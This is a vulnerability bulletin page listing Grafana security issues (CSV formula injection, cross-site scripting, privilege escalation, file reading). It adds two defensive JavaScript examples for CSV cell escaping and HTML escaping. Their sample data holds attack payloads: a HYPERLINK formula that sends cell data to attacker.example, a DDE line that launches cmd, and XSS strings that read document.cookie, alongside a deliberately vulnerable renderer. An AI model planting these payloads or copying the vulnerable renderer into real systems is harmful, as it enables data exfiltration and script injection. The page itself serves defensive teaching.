The Vigil@nce team watches public vulnerabilities impacting your computers, and then offers security solutions, a database and tools to fix them.

Computer vulnerabilities of Grafana

computer vulnerability bulletin 29478

Grafana: privilege escalation via CSV Formula Injection

Synthesis of the vulnerability

An attacker can bypass restrictions via CSV Formula Injection of Grafana, in order to escalate his privileges.
Impacted products: Grafana.
Severity: 2/4.
Consequences: user access/rights, data reading.
Provenance: document.
Creation date: 06/06/2019.
Identifiers: VIGILANCE-VUL-29478.

Description of the vulnerability

An attacker can bypass restrictions via CSV Formula Injection of Grafana, in order to escalate his privileges.
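Bulletin 29478 names the vector (CSV formula injection) but not where in Grafana the CSV is produced. The JavaScript below is an added example written for this page, not Grafana's code and not the fix shipped for this bulletin: it shows the generic defence against the vector, which is to neutralise any text cell that a spreadsheet would evaluate as a formula when the export is opened (a cell starting with =, +, -, @, tab or carriage return). The function names and the sample rows are constructed assumptions.

```javascript
// Added example for bulletin 29478 (not Grafana's own code).
// Neutralise CSV formula injection at export time.

// Characters that make a spreadsheet evaluate a cell as a formula.
// Tab and CR are included because some spreadsheets strip them before
// looking at the first character.
const FORMULA_TRIGGERS = /^[=+\-@\t\r]/;

// Render one cell. Numeric values are left alone (a negative number is not
// an attacker-controlled formula, and prefixing it would corrupt the data);
// strings that begin with a trigger character are prefixed with a single
// quote, which spreadsheets treat as "this cell is text".
function csvCell(value) {
  if (typeof value === 'number') return String(value);
  let s = String(value);
  if (FORMULA_TRIGGERS.test(s)) s = "'" + s;
  // RFC 4180 quoting: wrap the field if it contains a quote, comma or newline,
  // doubling any embedded quote.
  if (/[",\r\n]/.test(s)) s = '"' + s.replace(/"/g, '""') + '"';
  return s;
}

// Render a table (array of rows) as CSV text with CRLF line endings.
function toCsv(rows) {
  return rows.map((row) => row.map(csvCell).join(',')).join('\r\n');
}

// Constructed sample: a host label that a user with edit rights on a
// dashboard or data source could plant, exported next to legitimate rows.
// The two payload rows are the classic spreadsheet formula and DDE shapes.
const SAMPLE_ROWS = [
  ['host', 'cpu_percent'],
  ['web-01', 12.5],
  ['=HYPERLINK("http://attacker.example/?"&A1,"click")', 99],
  ["-2+3+cmd|' /C calc'!A0", 0],
];

console.log(toCsv(SAMPLE_ROWS));
```

The caveat a practitioner should keep in mind: the prefix only protects consumers that honour the leading quote as a text marker, and it changes the exported value, so the neutralisation belongs at the export boundary (where the file is written for a spreadsheet), not in the stored data. Apply it to string cells only, as above; applying it to numeric columns breaks the data.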

vulnerability CVE-2019-10909 CVE-2019-11358

jQuery, Symfony: Cross Site Scripting via templates

Synthesis of the vulnerability

An attacker can trigger a Cross Site Scripting via templates in Symfony, in order to run JavaScript code in the context of the web site.
Impacted products: Debian, Drupal Core, Fedora, Grafana, IBM API Connect, Joomla Extensions ~ not comprehensive, openSUSE Leap, Red Hat SSO, SLES, Symfony, Synology DSM, TYPO3 Core.
Severity: 2/4.
Consequences: client access/rights.
Provenance: document.
Number of vulnerabilities in this bulletin: 2.
Creation date: 18/04/2019.
Identifiers: CERTFR-2019-AVI-180, CVE-2019-10909, CVE-2019-11358, DLA-1777-1, DLA-1777-2, DLA-1778-1, DLA-1797-1, DRUPAL-SA-CORE-2019-005, DRUPAL-SA-CORE-2019-006, DSA-4434-1, DSA-4441-1, FEDORA-2019-2a7f472198, FEDORA-2019-32067d8b15, FEDORA-2019-3ee6a7adf2, FEDORA-2019-a3ca65028c, FEDORA-2019-f8db687840, ibm10882578, ibm10882596, ibm10882756, ibm10882762, ibm10882952, ibm10882956, openSUSE-SU-2019:1839-1, openSUSE-SU-2019:1872-1, RHSA-2019:1456-01, Synology-SA-19:19, TYPO3-CORE-SA-2019-009, TYPO3-CORE-SA-2019-010, TYPO3-CORE-SA-2019-011, TYPO3-CORE-SA-2019-012, TYPO3-CORE-SA-2019-013, TYPO3-PSA-2019-004, TYPO3-PSA-2019-005, TYPO3-PSA-2019-006, VIGILANCE-VUL-29070.

Description of the vulnerability

An attacker can trigger a Cross Site Scripting via templates in Symfony, in order to run JavaScript code in the context of the web site.

computer vulnerability bulletin 28688

Grafana: privilege escalation via Org-Admin/Alerting Pages

Synthesis of the vulnerability

An attacker can bypass restrictions via Org-Admin/Alerting Pages of Grafana, in order to escalate his privileges.
Impacted products: Grafana.
Severity: 2/4.
Consequences: privileged access/rights, data creation/edition.
Provenance: user account.
Creation date: 07/03/2019.
Identifiers: VIGILANCE-VUL-28688.

Description of the vulnerability

An attacker can bypass restrictions via Org-Admin/Alerting Pages of Grafana, in order to escalate his privileges.

computer vulnerability note 27939

Grafana: code execution via go-macaroon

Synthesis of the vulnerability

An attacker can use a vulnerability via go-macaroon of Grafana, in order to run code.
Impacted products: Grafana.
Severity: 2/4.
Consequences: user access/rights.
Provenance: user shell.
Creation date: 03/12/2018.
Identifiers: 5469, VIGILANCE-VUL-27939.

Description of the vulnerability

An attacker can use a vulnerability via go-macaroon of Grafana, in order to run code.

vulnerability CVE-2018-19039

Grafana: file reading via Text Panels

Synthesis of the vulnerability

A local attacker can read a file via Text Panels of Grafana, in order to obtain sensitive information.
Impacted products: Grafana.
Severity: 2/4.
Consequences: data reading.
Provenance: privileged account.
Creation date: 14/11/2018.
Identifiers: CVE-2018-19039, VIGILANCE-VUL-27790.

Description of the vulnerability

A local attacker can read a file via Text Panels of Grafana, in order to obtain sensitive information.

vulnerability CVE-2018-1000816

Grafana: Cross Site Scripting via Query Editor

Synthesis of the vulnerability

An attacker can trigger a Cross Site Scripting via Query Editor of Grafana, in order to run JavaScript code in the context of the web site.
Impacted products: Grafana.
Severity: 2/4.
Consequences: client access/rights.
Provenance: document.
Creation date: 24/10/2018.
Identifiers: 13667, CVE-2018-1000816, VIGILANCE-VUL-27610.

Description of the vulnerability

The Grafana product offers a web service.

However, it does not filter data received via the Query Editor before inserting it into generated HTML documents.

An attacker can therefore trigger a Cross Site Scripting via the Query Editor of Grafana, in order to run JavaScript code in the context of the web site.

vulnerability note CVE-2018-15727

Grafana: privilege escalation via LDAP/OAuth

Synthesis of the vulnerability

An attacker can bypass restrictions via LDAP/OAuth of Grafana, in order to escalate his privileges.
Impacted products: Grafana.
Severity: 3/4.
Consequences: privileged access/rights, user access/rights.
Provenance: intranet client.
Number of vulnerabilities in this bulletin: 2.
Creation date: 29/08/2018.
Identifiers: CVE-2018-15727, CVE-2018-558213-REJECT, VIGILANCE-VUL-27104.

Description of the vulnerability

An attacker can bypass restrictions via LDAP/OAuth of Grafana, in order to escalate his privileges.

vulnerability announcement 26592

Grafana: privilege escalation via Proxy IP Address

Synthesis of the vulnerability

An attacker can bypass restrictions via Proxy IP Address of Grafana, in order to escalate his privileges.
Impacted products: Grafana.
Severity: 2/4.
Consequences: data reading, data flow.
Provenance: internet client.
Creation date: 29/06/2018.
Identifiers: VIGILANCE-VUL-26592.

Description of the vulnerability

An attacker can bypass restrictions via Proxy IP Address of Grafana, in order to escalate his privileges.

computer vulnerability 26455

Grafana: privilege escalation via API Keys Dashboard Overwrite

Synthesis of the vulnerability

An attacker can bypass restrictions via API Keys Dashboard Overwrite of Grafana, in order to escalate his privileges.
Impacted products: Grafana.
Severity: 2/4.
Consequences: data creation/edition, data deletion.
Provenance: user account.
Creation date: 19/06/2018.
Identifiers: 12343, VIGILANCE-VUL-26455.

Description of the vulnerability

An attacker can bypass restrictions via API Keys Dashboard Overwrite of Grafana, in order to escalate his privileges.

vulnerability note CVE-2018-12099

Grafana: Cross Site Scripting via Dashboard

Synthesis of the vulnerability

An attacker can trigger a Cross Site Scripting via Dashboard of Grafana, in order to run JavaScript code in the context of the web site.
Impacted products: Grafana.
Severity: 2/4.
Consequences: client access/rights.
Provenance: document.
Creation date: 12/06/2018.
Identifiers: CVE-2018-12099, VIGILANCE-VUL-26374.

Description of the vulnerability

The Grafana product offers a web service.

However, it does not filter data received via the Dashboard before inserting it into generated HTML documents.

An attacker can therefore trigger a Cross Site Scripting via the Dashboard of Grafana, in order to run JavaScript code in the context of the web site.
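The two Cross Site Scripting bulletins on this page (Query Editor, CVE-2018-1000816, and Dashboard, CVE-2018-12099) describe the same bug class: a string that a dashboard editor controls is inserted into generated HTML without filtering. The JavaScript below is an added example written for this page, not Grafana's frontend code and not the fix shipped for either bulletin. It puts the unfiltered rendering beside the escaped one and includes a check that tells them apart. The panel model, its field names, the renderer functions and the payloads are constructed assumptions chosen to show the pattern, which applies equally to the Query Editor and Dashboard cases.

```javascript
// Added example for CVE-2018-1000816 and CVE-2018-12099 (not Grafana's code).
// Editor-controlled strings rendered into HTML: vulnerable vs. escaped.

// Constructed sample standing in for a saved dashboard panel. Both fields are
// set by whoever can edit the dashboard or the query, and both are viewed by
// everyone who opens the dashboard. The title attacks the text context, the
// query attacks the attribute context.
const SAMPLE_PANEL = {
  title: 'CPU usage <img src=x onerror="alert(document.cookie)">',
  query: 'rate(http_requests_total[5m]) " onmouseover="alert(1)',
};

// Vulnerable: the strings are concatenated straight into markup, so the
// browser parses the payloads as tags and attributes.
function renderPanelVulnerable(panel) {
  return `<div class="panel-title" data-query="${panel.query}">${panel.title}</div>`;
}

// Escape the five characters that change meaning in HTML text and in
// double- or single-quoted attribute values.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened: the same template, with every untrusted value escaped for the
// context it lands in. (A framework that binds text via textContent or an
// auto-escaping template engine achieves the same thing; string building
// without escaping is the bug, not the template syntax.)
function renderPanelSafe(panel) {
  return `<div class="panel-title" data-query="${escapeHtml(panel.query)}">${escapeHtml(panel.title)}</div>`;
}

// Check: does the output contain any tag or attribute beyond the one <div>
// the template defines? The only markup allowed is the template's own; any
// '<', '>' or '"' reaching the dynamic parts means a payload survived.
// A crude detector, used here only to show the difference between renderers.
function untrustedMarkup(html) {
  const expected = /^<div class="panel-title" data-query="[^"<>]*">[^<>]*<\/div>$/;
  return !expected.test(html);
}

console.log('vulnerable:', renderPanelVulnerable(SAMPLE_PANEL));
console.log('safe:      ', renderPanelSafe(SAMPLE_PANEL));
console.log('payload survives in vulnerable output:', untrustedMarkup(renderPanelVulnerable(SAMPLE_PANEL)));
console.log('payload survives in safe output:      ', untrustedMarkup(renderPanelSafe(SAMPLE_PANEL)));
```

Escaping fixes the text and attribute contexts shown here; a value that ends up inside a script block, a URL or a CSS property needs the encoding for that context instead, and a panel type that deliberately renders HTML (a text panel in HTML mode) needs a sanitiser that allows only a safe tag and attribute list, not an escaper.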
